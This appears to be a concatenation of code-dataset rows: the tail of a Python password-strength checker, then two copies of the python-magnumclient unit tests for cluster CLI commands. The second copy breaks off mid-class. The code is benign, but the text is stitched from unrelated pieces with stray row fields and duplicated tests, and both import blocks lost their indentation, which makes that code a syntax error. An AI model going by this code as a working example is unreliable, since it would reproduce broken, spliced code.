        response = input(ask)
        if response[:1].lower() == 'y':
            # Importing Setup runs the interactive (re)configuration script.
            import Setup
            prompt()
            return
    else:
        # Unrecognized (or empty) answer: ask again.
        prompt()
def operations():
    """Load thresholds from the settings file, run one strength test on a
    password read from stdin, print the result, and re-prompt."""
    minLen = 0
    maxLen = 0
    specChar = None
    requires = {}
    #read settings file
    with open(settings,'r') as file:
        for line in file:
            # Everything after the first ':' on the line is the value.
            spot = line.find(':') + 1
            if 'minLength: ' in line:
                # NOTE(review): minLen/maxLen stay raw string slices
                # (including the trailing newline) while the req* values
                # are int()-converted — confirm StrengthTest coerces them.
                minLen = line[spot:]
            elif 'maxLength: ' in line:
                maxLen = line[spot:]
            elif 'reqCap: ' in line:
                requires['reqCap'] = int(line[spot:])
            elif 'reqLow: ' in line:
                requires['reqLow'] = int(line[spot:])
            elif 'reqNum: ' in line:
                requires['reqNum'] = int(line[spot:])
            elif 'reqSpec: ' in line:
                requires['reqSpec'] = int(line[spot:])
            elif 'special: ' in line:
                specChar = line[spot:].rstrip()
            elif 'DONE' in line:
                break;
    test = StrengthTest(minLen, maxLen, requires, specChar)
    results = test.evaluate(input("Please enter your password: "))
    # Clear the console (Windows vs POSIX) before showing the results.
    os.system('cls' if os.name=='nt' else 'clear')
    outputInfo(results)
    prompt(True)
def outputInfo(results):
    """Print one evaluation result dict in a human-readable form."""
    # print() with comma-separated arguments inserts a single space
    # between every piece; kept as-is since changing it would alter the
    # program's output.
    print("Your password, "
          , results['password']
          , " is "
          , ("" if results['viable'] else "not ")
          , "valid.\nScore: "
          , results['score']
          , "\nTotal possible score: "
          , results['max']
          , "\nRating: "
          , round(results['rating'],2)
          , "%\nNotes: "
          , results['notes'])
#script
# Entry: run the test if a settings file exists, otherwise perform the
# first-time setup (importing Setup runs the configuration script).
if os.path.isfile(settings):
    print("Settings found.\n")
    prompt()
else:
    print ("No settings file has been detected.\nPerforming first time setup.\n")
    import Setup
    print ("Setup complete.\n")
    # NOTE(review): the trailing "| ... |" below is a dataset
    # row-separator artifact, not part of the program.
    prompt() | 0.069704 | 0.069668 |
import copy
import mock
import os
import sys
import tempfile
from contextlib import contextmanager
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from mock import call
from magnumclient import exceptions
from magnumclient.osc.v1 import clusters as osc_clusters
from magnumclient.tests.osc.unit.v1 import fakes as magnum_fakes
class TestCluster(magnum_fakes.TestMagnumClientOSCV1):
    """Shared base for the cluster-command tests: exposes the fake
    clusters and certificates managers used by every case below."""
    def setUp(self):
        super(TestCluster, self).setUp()
        self.clusters_mock = self.app.client_manager.container_infra.clusters
        self.certificates_mock = \
            self.app.client_manager.container_infra.certificates
class TestClusterCreate(TestCluster):
    """Tests for the `coe cluster create` command (CreateCluster)."""
    def setUp(self):
        super(TestClusterCreate, self).setUp()
        attr = dict()
        attr['name'] = 'fake-cluster-1'
        self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
        # Keyword arguments the command is expected to pass to
        # clusters.create() when only the required CLI options are given.
        self._default_args = {
            'cluster_template_id': 'fake-ct',
            'create_timeout': 60,
            'discovery_url': None,
            'keypair': None,
            'master_count': 1,
            'name': 'fake-cluster-1',
            'node_count': 1,
        }
        self.clusters_mock.create = mock.Mock()
        self.clusters_mock.create.return_value = self._cluster
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = copy.deepcopy(self._cluster)
        self.clusters_mock.update = mock.Mock()
        self.clusters_mock.update.return_value = self._cluster
        # Get the command object to test
        self.cmd = osc_clusters.CreateCluster(self.app, None)
        self.data = tuple(map(lambda x: getattr(self._cluster, x),
                              osc_clusters.CLUSTER_ATTRIBUTES))
    def test_cluster_create_required_args_pass(self):
        """Verifies required arguments."""
        arglist = [
            '--cluster-template', self._cluster.cluster_template_id,
            self._cluster.name
        ]
        verifylist = [
            ('cluster_template', self._cluster.cluster_template_id),
            ('name', self._cluster.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.create.assert_called_with(**self._default_args)
    def test_cluster_create_missing_required_arg(self):
        """Verifies missing required arguments."""
        arglist = [
            self._cluster.name
        ]
        verifylist = [
            ('name', self._cluster.name)
        ]
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
    def test_cluster_create_with_labels(self):
        """Verifies labels are properly parsed when given as argument."""
        expected_args = self._default_args
        expected_args['labels'] = {
            'arg1': 'value1', 'arg2': 'value2'
        }
        arglist = [
            '--cluster-template', self._cluster.cluster_template_id,
            '--labels', 'arg1=value1',
            '--labels', 'arg2=value2',
            self._cluster.name
        ]
        verifylist = [
            ('cluster_template', self._cluster.cluster_template_id),
            ('labels', ['arg1=value1', 'arg2=value2']),
            ('name', self._cluster.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.create.assert_called_with(**expected_args)
class TestClusterDelete(TestCluster):
    """Tests for the `coe cluster delete` command (DeleteCluster)."""
    def setUp(self):
        super(TestClusterDelete, self).setUp()
        self.clusters_mock.delete = mock.Mock()
        self.clusters_mock.delete.return_value = None
        # Get the command object to test
        self.cmd = osc_clusters.DeleteCluster(self.app, None)
    def test_cluster_delete_one(self):
        arglist = ['foo']
        verifylist = [('cluster', ['foo'])]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.delete.assert_called_with('foo')
    def test_cluster_delete_multiple(self):
        arglist = ['foo', 'bar']
        verifylist = [('cluster', ['foo', 'bar'])]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.delete.assert_has_calls([call('foo'), call('bar')])
    def test_cluster_delete_bad_uuid(self):
        # A non-existent cluster id is tolerated: take_action returns None.
        arglist = ['foo']
        verifylist = [('cluster', ['foo'])]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        returns = self.cmd.take_action(parsed_args)
        self.assertEqual(returns, None)
    def test_cluster_delete_no_uuid(self):
        arglist = []
        verifylist = [('cluster', [])]
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
class TestClusterList(TestCluster):
    """Tests for the `coe cluster list` command (ListCluster)."""
    attr = dict()
    attr['name'] = 'fake-cluster-1'
    _cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
    # Columns the list command is expected to display.
    columns = [
        'uuid',
        'name',
        'keypair',
        'node_count',
        'master_count',
        'status',
        'health_status'
    ]
    # Expected row data, in the same order as `columns`.
    datalist = (
        (
            _cluster.uuid,
            _cluster.name,
            _cluster.keypair,
            _cluster.node_count,
            _cluster.master_count,
            _cluster.status,
            _cluster.health_status,
        ),
    )
    def setUp(self):
        super(TestClusterList, self).setUp()
        self.clusters_mock.list = mock.Mock()
        self.clusters_mock.list.return_value = [self._cluster]
        # Get the command object to test
        self.cmd = osc_clusters.ListCluster(self.app, None)
    def test_cluster_list_no_options(self):
        arglist = []
        verifylist = [
            ('limit', None),
            ('sort_key', None),
            ('sort_dir', None),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.clusters_mock.list.assert_called_with(
            limit=None,
            sort_dir=None,
            sort_key=None,
        )
        self.assertEqual(self.columns, columns)
        self.assertEqual(self.datalist, tuple(data))
    def test_cluster_list_options(self):
        arglist = [
            '--limit', '1',
            '--sort-key', 'key',
            '--sort-dir', 'asc'
        ]
        verifylist = [
            ('limit', 1),
            ('sort_key', 'key'),
            ('sort_dir', 'asc')
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.list.assert_called_with(
            limit=1,
            sort_dir='asc',
            sort_key='key',
        )
    def test_cluster_list_bad_sort_dir_fail(self):
        # 'foo' is not a valid sort direction; parsing must fail.
        arglist = [
            '--sort-dir', 'foo'
        ]
        verifylist = [
            ('limit', None),
            ('sort_key', None),
            ('sort_dir', 'foo'),
            ('fields', None),
        ]
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
class TestClusterUpdate(TestCluster):
    """Tests for the `coe cluster update` command (UpdateCluster)."""
    def setUp(self):
        super(TestClusterUpdate, self).setUp()
        self.clusters_mock.update = mock.Mock()
        self.clusters_mock.update.return_value = None
        # Get the command object to test
        self.cmd = osc_clusters.UpdateCluster(self.app, None)
    def test_cluster_update_pass(self):
        # The CLI triple (cluster, op, attribute) becomes a JSON-patch op.
        arglist = ['foo', 'remove', 'bar']
        verifylist = [
            ('cluster', 'foo'),
            ('op', 'remove'),
            ('attributes', [['bar']]),
            ('rollback', False)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.update.assert_called_with(
            'foo',
            [{'op': 'remove', 'path': '/bar'}]
        )
    def test_cluster_update_bad_op(self):
        # 'bar' is not a valid patch operation; parsing must fail.
        arglist = ['foo', 'bar', 'snafu']
        verifylist = [
            ('cluster', 'foo'),
            ('op', 'bar'),
            ('attributes', ['snafu']),
            ('rollback', False)
        ]
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
class TestClusterShow(TestCluster):
    """Tests for the `coe cluster show` command (ShowCluster)."""
    def setUp(self):
        super(TestClusterShow, self).setUp()
        attr = dict()
        attr['name'] = 'fake-cluster-1'
        self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = self._cluster
        # Get the command object to test
        self.cmd = osc_clusters.ShowCluster(self.app, None)
        self.data = tuple(map(lambda x: getattr(self._cluster, x),
                              osc_clusters.CLUSTER_ATTRIBUTES))
    def test_cluster_show_pass(self):
        arglist = ['fake-cluster']
        verifylist = [
            ('cluster', 'fake-cluster')
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.clusters_mock.get.assert_called_with('fake-cluster')
        self.assertEqual(osc_clusters.CLUSTER_ATTRIBUTES, columns)
        self.assertEqual(self.data, data)
    def test_cluster_show_no_cluster_fail(self):
        arglist = []
        verifylist = []
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
@contextmanager
def capture(command, *args, **kwargs):
    """Run *command* and yield everything it printed to stdout.

    stdout is temporarily replaced with an in-memory buffer and always
    restored, even if the command raises.
    """
    saved_stdout = sys.stdout
    sys.stdout = StringIO()
    try:
        command(*args, **kwargs)
        sys.stdout.seek(0)
        yield sys.stdout.read()
    finally:
        sys.stdout = saved_stdout
class TestClusterConfig(TestCluster):
    """Tests for the `coe cluster config` command (ConfigCluster): it
    should emit a KUBECONFIG export line pointing at the written file."""
    def setUp(self):
        super(TestClusterConfig, self).setUp()
        attr = dict()
        attr['name'] = 'fake-cluster-1'
        attr['status'] = 'CREATE_COMPLETE'
        self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = self._cluster
        cert = magnum_fakes.FakeCert(pem='foo bar')
        self.certificates_mock.create = mock.Mock()
        self.certificates_mock.create.return_value = cert
        self.certificates_mock.get = mock.Mock()
        self.certificates_mock.get.return_value = cert
        # Fake the cluster_template
        attr = dict()
        attr['name'] = 'fake-ct'
        self._cluster_template = \
            magnum_fakes.FakeClusterTemplate.create_one_cluster_template(attr)
        self.cluster_templates_mock = \
            self.app.client_manager.container_infra.cluster_templates
        self.cluster_templates_mock.get = mock.Mock()
        self.cluster_templates_mock.get.return_value = self._cluster_template
        # Get the command object to test
        self.cmd = osc_clusters.ConfigCluster(self.app, None)
    def test_cluster_config_no_cluster_fail(self):
        arglist = []
        verifylist = []
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
    @mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
    def test_cluster_config_custom_dir_with_config_only_works_if_force(self):
        # An existing config file must only be overwritten with --force.
        tmp_dir = tempfile.mkdtemp()
        open(os.path.join(tmp_dir, 'config'), 'a').close() # touch config
        arglist = ['fake-cluster', '--dir', tmp_dir]
        verifylist = [
            ('cluster', 'fake-cluster'),
            ('force', False),
            ('dir', tmp_dir),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.assertRaises(exceptions.CommandError,
                          self.cmd.take_action, parsed_args)
        self.clusters_mock.get.assert_called_with('fake-cluster')
        arglist = ['fake-cluster', '--force', '--dir', tmp_dir]
        verifylist = [
            ('cluster', 'fake-cluster'),
            ('force', True),
            ('dir', tmp_dir),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
        with capture(self.cmd.take_action, parsed_args) as output:
            self.assertEqual(expected_value, output)
        self.clusters_mock.get.assert_called_with('fake-cluster')
    @mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
    def test_cluster_config_with_custom_dir(self):
        tmp_dir = tempfile.mkdtemp()
        arglist = ['fake-cluster', '--dir', tmp_dir]
        verifylist = [
            ('cluster', 'fake-cluster'),
            ('dir', tmp_dir),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
        with capture(self.cmd.take_action, parsed_args) as output:
            self.assertEqual(expected_value, output)
        self.clusters_mock.get.assert_called_with('fake-cluster')
    @mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
    def test_cluster_config_creates_config_in_cwd_if_not_dir_specified(self):
        tmp_dir = tempfile.mkdtemp()
        os.chdir(tmp_dir)
        arglist = ['fake-cluster']
        verifylist = [
            ('cluster', 'fake-cluster'),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        expected_value = '''\
export KUBECONFIG={}/config
'''.format(os.getcwd())
        with capture(self.cmd.take_action, parsed_args) as output:
            self.assertEqual(expected_value, output)
        self.clusters_mock.get.assert_called_with('fake-cluster')
class TestClusterResize(TestCluster):
    """Tests for the `coe cluster resize` command (ResizeCluster)."""
    def setUp(self):
        super(TestClusterResize, self).setUp()
        self.cluster = mock.Mock()
        self.cluster.uuid = "UUID1"
        self.clusters_mock.resize = mock.Mock()
        self.clusters_mock.resize.return_value = None
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = self.cluster
        # Get the command object to test
        self.cmd = osc_clusters.ResizeCluster(self.app, None)
    def test_cluster_resize_pass(self):
        arglist = ['foo', '2']
        verifylist = [
            ('cluster', 'foo'),
            ('node_count', 2),
            ('nodes_to_remove', None),
            ('nodegroup', None)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.resize.assert_called_with(
            "UUID1", 2, None, None
        )
class TestClusterUpgrade(TestCluster):
    """Tests for the `coe cluster upgrade` command (UpgradeCluster)."""
    def setUp(self):
        super(TestClusterUpgrade, self).setUp()
        self.cluster = mock.Mock()
        self.cluster.uuid = "UUID1"
        self.clusters_mock.upgrade = mock.Mock()
        self.clusters_mock.upgrade.return_value = None
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = self.cluster
        # Get the command object to test
        self.cmd = osc_clusters.UpgradeCluster(self.app, None)
    def test_cluster_upgrade_pass(self):
        cluster_template_id = 'TEMPLATE_ID'
        arglist = ['foo', cluster_template_id]
        verifylist = [
            ('cluster', 'foo'),
            ('cluster_template', cluster_template_id),
            ('max_batch_size', 1),
            ('nodegroup', None)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.upgrade.assert_called_with(
            # NOTE(review): the trailing "| ... |" below is a dataset
            # row-separator artifact, not part of the program.
            "UUID1", cluster_template_id, 1, None
        ) | magnumclient/tests/osc/unit/v1/test_clusters.py |
import copy
import mock
import os
import sys
import tempfile
from contextlib import contextmanager
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from mock import call
from magnumclient import exceptions
from magnumclient.osc.v1 import clusters as osc_clusters
from magnumclient.tests.osc.unit.v1 import fakes as magnum_fakes
class TestCluster(magnum_fakes.TestMagnumClientOSCV1):
    """Shared base for the cluster-command tests: exposes the fake
    clusters and certificates managers used by every case below."""
    def setUp(self):
        super(TestCluster, self).setUp()
        self.clusters_mock = self.app.client_manager.container_infra.clusters
        self.certificates_mock = \
            self.app.client_manager.container_infra.certificates
class TestClusterCreate(TestCluster):
    """Tests for the `coe cluster create` command (CreateCluster)."""
    def setUp(self):
        super(TestClusterCreate, self).setUp()
        attr = dict()
        attr['name'] = 'fake-cluster-1'
        self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
        # Keyword arguments the command is expected to pass to
        # clusters.create() when only the required CLI options are given.
        self._default_args = {
            'cluster_template_id': 'fake-ct',
            'create_timeout': 60,
            'discovery_url': None,
            'keypair': None,
            'master_count': 1,
            'name': 'fake-cluster-1',
            'node_count': 1,
        }
        self.clusters_mock.create = mock.Mock()
        self.clusters_mock.create.return_value = self._cluster
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = copy.deepcopy(self._cluster)
        self.clusters_mock.update = mock.Mock()
        self.clusters_mock.update.return_value = self._cluster
        # Get the command object to test
        self.cmd = osc_clusters.CreateCluster(self.app, None)
        self.data = tuple(map(lambda x: getattr(self._cluster, x),
                              osc_clusters.CLUSTER_ATTRIBUTES))
    def test_cluster_create_required_args_pass(self):
        """Verifies required arguments."""
        arglist = [
            '--cluster-template', self._cluster.cluster_template_id,
            self._cluster.name
        ]
        verifylist = [
            ('cluster_template', self._cluster.cluster_template_id),
            ('name', self._cluster.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.create.assert_called_with(**self._default_args)
    def test_cluster_create_missing_required_arg(self):
        """Verifies missing required arguments."""
        arglist = [
            self._cluster.name
        ]
        verifylist = [
            ('name', self._cluster.name)
        ]
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
    def test_cluster_create_with_labels(self):
        """Verifies labels are properly parsed when given as argument."""
        expected_args = self._default_args
        expected_args['labels'] = {
            'arg1': 'value1', 'arg2': 'value2'
        }
        arglist = [
            '--cluster-template', self._cluster.cluster_template_id,
            '--labels', 'arg1=value1',
            '--labels', 'arg2=value2',
            self._cluster.name
        ]
        verifylist = [
            ('cluster_template', self._cluster.cluster_template_id),
            ('labels', ['arg1=value1', 'arg2=value2']),
            ('name', self._cluster.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.create.assert_called_with(**expected_args)
class TestClusterDelete(TestCluster):
    """Tests for the ``coe cluster delete`` OSC command."""

    def setUp(self):
        super(TestClusterDelete, self).setUp()
        self.clusters_mock.delete = mock.Mock(return_value=None)
        # Command under test.
        self.cmd = osc_clusters.DeleteCluster(self.app, None)

    def test_cluster_delete_one(self):
        """A single name results in one delete() call."""
        parsed_args = self.check_parser(
            self.cmd, ['foo'], [('cluster', ['foo'])])
        self.cmd.take_action(parsed_args)
        self.clusters_mock.delete.assert_called_with('foo')

    def test_cluster_delete_multiple(self):
        """Each given name is deleted in order."""
        parsed_args = self.check_parser(
            self.cmd, ['foo', 'bar'], [('cluster', ['foo', 'bar'])])
        self.cmd.take_action(parsed_args)
        self.clusters_mock.delete.assert_has_calls(
            [call('foo'), call('bar')])

    def test_cluster_delete_bad_uuid(self):
        """A non-existent cluster still yields a None result."""
        parsed_args = self.check_parser(
            self.cmd, ['foo'], [('cluster', ['foo'])])
        self.assertEqual(self.cmd.take_action(parsed_args), None)

    def test_cluster_delete_no_uuid(self):
        """At least one cluster argument is required."""
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, [], [('cluster', [])])
class TestClusterList(TestCluster):
    """Tests for the ``coe cluster list`` OSC command."""

    # Fake cluster built at class-definition time, so the same object is
    # shared by all tests in this class.
    attr = dict()
    attr['name'] = 'fake-cluster-1'
    _cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
    # Column headers ListCluster is expected to emit.
    columns = [
        'uuid',
        'name',
        'keypair',
        'node_count',
        'master_count',
        'status',
        'health_status'
    ]
    # Expected row data for the single fake cluster, in column order.
    datalist = (
        (
            _cluster.uuid,
            _cluster.name,
            _cluster.keypair,
            _cluster.node_count,
            _cluster.master_count,
            _cluster.status,
            _cluster.health_status,
        ),
    )

    def setUp(self):
        super(TestClusterList, self).setUp()
        self.clusters_mock.list = mock.Mock()
        self.clusters_mock.list.return_value = [self._cluster]
        # Get the command object to test
        self.cmd = osc_clusters.ListCluster(self.app, None)

    def test_cluster_list_no_options(self):
        """Without CLI options, list() is called with all-None filters."""
        arglist = []
        verifylist = [
            ('limit', None),
            ('sort_key', None),
            ('sort_dir', None),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.clusters_mock.list.assert_called_with(
            limit=None,
            sort_dir=None,
            sort_key=None,
        )
        self.assertEqual(self.columns, columns)
        self.assertEqual(self.datalist, tuple(data))

    def test_cluster_list_options(self):
        """limit/sort CLI options are forwarded to the API verbatim."""
        arglist = [
            '--limit', '1',
            '--sort-key', 'key',
            '--sort-dir', 'asc'
        ]
        verifylist = [
            ('limit', 1),
            ('sort_key', 'key'),
            ('sort_dir', 'asc')
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.list.assert_called_with(
            limit=1,
            sort_dir='asc',
            sort_key='key',
        )

    def test_cluster_list_bad_sort_dir_fail(self):
        """An invalid --sort-dir value is rejected at parse time."""
        arglist = [
            '--sort-dir', 'foo'
        ]
        verifylist = [
            ('limit', None),
            ('sort_key', None),
            ('sort_dir', 'foo'),
            ('fields', None),
        ]
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)
class TestClusterUpdate(TestCluster):
    """Tests for the ``coe cluster update`` OSC command."""

    def setUp(self):
        super(TestClusterUpdate, self).setUp()
        self.clusters_mock.update = mock.Mock(return_value=None)
        # Command under test.
        self.cmd = osc_clusters.UpdateCluster(self.app, None)

    def test_cluster_update_pass(self):
        """A valid patch op is forwarded as a JSON-patch style dict."""
        arglist = ['foo', 'remove', 'bar']
        verifylist = [
            ('cluster', 'foo'),
            ('op', 'remove'),
            ('attributes', [['bar']]),
            ('rollback', False),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        expected_patch = [{'op': 'remove', 'path': '/bar'}]
        self.clusters_mock.update.assert_called_with('foo', expected_patch)

    def test_cluster_update_bad_op(self):
        """An unknown patch op is rejected by the parser."""
        self.assertRaises(
            magnum_fakes.MagnumParseException,
            self.check_parser, self.cmd,
            ['foo', 'bar', 'snafu'],
            [('cluster', 'foo'), ('op', 'bar'),
             ('attributes', ['snafu']), ('rollback', False)])
class TestClusterShow(TestCluster):
    """Tests for the ``coe cluster show`` OSC command."""

    def setUp(self):
        super(TestClusterShow, self).setUp()
        self._cluster = magnum_fakes.FakeCluster.create_one_cluster(
            {'name': 'fake-cluster-1'})
        self.clusters_mock.get = mock.Mock(return_value=self._cluster)
        # Command under test.
        self.cmd = osc_clusters.ShowCluster(self.app, None)
        # Expected row data, ordered to match CLUSTER_ATTRIBUTES.
        self.data = tuple(getattr(self._cluster, attr_name)
                          for attr_name in osc_clusters.CLUSTER_ATTRIBUTES)

    def test_cluster_show_pass(self):
        """show returns the attribute columns plus the cluster's values."""
        parsed_args = self.check_parser(
            self.cmd, ['fake-cluster'], [('cluster', 'fake-cluster')])
        columns, data = self.cmd.take_action(parsed_args)
        self.clusters_mock.get.assert_called_with('fake-cluster')
        self.assertEqual(osc_clusters.CLUSTER_ATTRIBUTES, columns)
        self.assertEqual(self.data, data)

    def test_cluster_show_no_cluster_fail(self):
        """A cluster name/ID argument is mandatory."""
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, [], [])
@contextmanager
def capture(command, *args, **kwargs):
    """Run *command* with stdout redirected; yield the captured text.

    stdout is always restored, even if the command raises.
    """
    original_stdout = sys.stdout
    sys.stdout = StringIO()
    try:
        command(*args, **kwargs)
        sys.stdout.seek(0)
        yield sys.stdout.read()
    finally:
        sys.stdout = original_stdout
class TestClusterConfig(TestCluster):
    """Tests for the ``coe cluster config`` OSC command."""

    def setUp(self):
        super(TestClusterConfig, self).setUp()
        attr = dict()
        attr['name'] = 'fake-cluster-1'
        # The config command only works against a completed cluster.
        attr['status'] = 'CREATE_COMPLETE'
        self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = self._cluster
        cert = magnum_fakes.FakeCert(pem='foo bar')
        self.certificates_mock.create = mock.Mock()
        self.certificates_mock.create.return_value = cert
        self.certificates_mock.get = mock.Mock()
        self.certificates_mock.get.return_value = cert
        # Fake the cluster_template
        attr = dict()
        attr['name'] = 'fake-ct'
        self._cluster_template = \
            magnum_fakes.FakeClusterTemplate.create_one_cluster_template(attr)
        self.cluster_templates_mock = \
            self.app.client_manager.container_infra.cluster_templates
        self.cluster_templates_mock.get = mock.Mock()
        self.cluster_templates_mock.get.return_value = self._cluster_template
        # Get the command object to test
        self.cmd = osc_clusters.ConfigCluster(self.app, None)

    def test_cluster_config_no_cluster_fail(self):
        """A cluster name/ID argument is mandatory."""
        arglist = []
        verifylist = []
        self.assertRaises(magnum_fakes.MagnumParseException,
                          self.check_parser, self.cmd, arglist, verifylist)

    @mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
    def test_cluster_config_custom_dir_with_config_only_works_if_force(self):
        """An existing config file is only overwritten when --force is set."""
        # NOTE(review): mkdtemp dirs are never cleaned up -- consider
        # addCleanup(shutil.rmtree, tmp_dir).
        tmp_dir = tempfile.mkdtemp()
        open(os.path.join(tmp_dir, 'config'), 'a').close()  # touch config
        arglist = ['fake-cluster', '--dir', tmp_dir]
        verifylist = [
            ('cluster', 'fake-cluster'),
            ('force', False),
            ('dir', tmp_dir),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.assertRaises(exceptions.CommandError,
                          self.cmd.take_action, parsed_args)
        self.clusters_mock.get.assert_called_with('fake-cluster')
        # Retry with --force: the command now prints the KUBECONFIG export.
        arglist = ['fake-cluster', '--force', '--dir', tmp_dir]
        verifylist = [
            ('cluster', 'fake-cluster'),
            ('force', True),
            ('dir', tmp_dir),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
        with capture(self.cmd.take_action, parsed_args) as output:
            self.assertEqual(expected_value, output)
        self.clusters_mock.get.assert_called_with('fake-cluster')

    @mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
    def test_cluster_config_with_custom_dir(self):
        """--dir writes the kubeconfig into the given directory."""
        tmp_dir = tempfile.mkdtemp()
        arglist = ['fake-cluster', '--dir', tmp_dir]
        verifylist = [
            ('cluster', 'fake-cluster'),
            ('dir', tmp_dir),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
        with capture(self.cmd.take_action, parsed_args) as output:
            self.assertEqual(expected_value, output)
        self.clusters_mock.get.assert_called_with('fake-cluster')

    @mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
    def test_cluster_config_creates_config_in_cwd_if_not_dir_specified(self):
        """Without --dir the config lands in the current directory."""
        tmp_dir = tempfile.mkdtemp()
        # NOTE(review): os.chdir is never undone, so this leaks the working
        # directory into later tests -- confirm that is acceptable.
        os.chdir(tmp_dir)
        arglist = ['fake-cluster']
        verifylist = [
            ('cluster', 'fake-cluster'),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        expected_value = '''\
export KUBECONFIG={}/config
'''.format(os.getcwd())
        with capture(self.cmd.take_action, parsed_args) as output:
            self.assertEqual(expected_value, output)
        self.clusters_mock.get.assert_called_with('fake-cluster')
class TestClusterResize(TestCluster):
    """Tests for the ``coe cluster resize`` OSC command."""

    def setUp(self):
        super(TestClusterResize, self).setUp()
        # Fake cluster returned by the lookup; only its uuid is consumed.
        self.cluster = mock.Mock()
        self.cluster.uuid = "UUID1"
        self.clusters_mock.resize = mock.Mock(return_value=None)
        self.clusters_mock.get = mock.Mock(return_value=self.cluster)
        # Command under test.
        self.cmd = osc_clusters.ResizeCluster(self.app, None)

    def test_cluster_resize_pass(self):
        """resize() receives the resolved UUID plus the parsed arguments."""
        arglist = ['foo', '2']
        verifylist = [
            ('cluster', 'foo'),
            ('node_count', 2),
            ('nodes_to_remove', None),
            ('nodegroup', None),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.clusters_mock.resize.assert_called_with("UUID1", 2, None, None)
class TestClusterUpgrade(TestCluster):
    """Tests for the ``coe cluster upgrade`` OSC command."""

    def setUp(self):
        super(TestClusterUpgrade, self).setUp()
        # Fake cluster returned by the lookup; only its uuid is consumed.
        self.cluster = mock.Mock()
        self.cluster.uuid = "UUID1"
        self.clusters_mock.upgrade = mock.Mock()
        self.clusters_mock.upgrade.return_value = None
        self.clusters_mock.get = mock.Mock()
        self.clusters_mock.get.return_value = self.cluster
        # Get the command object to test
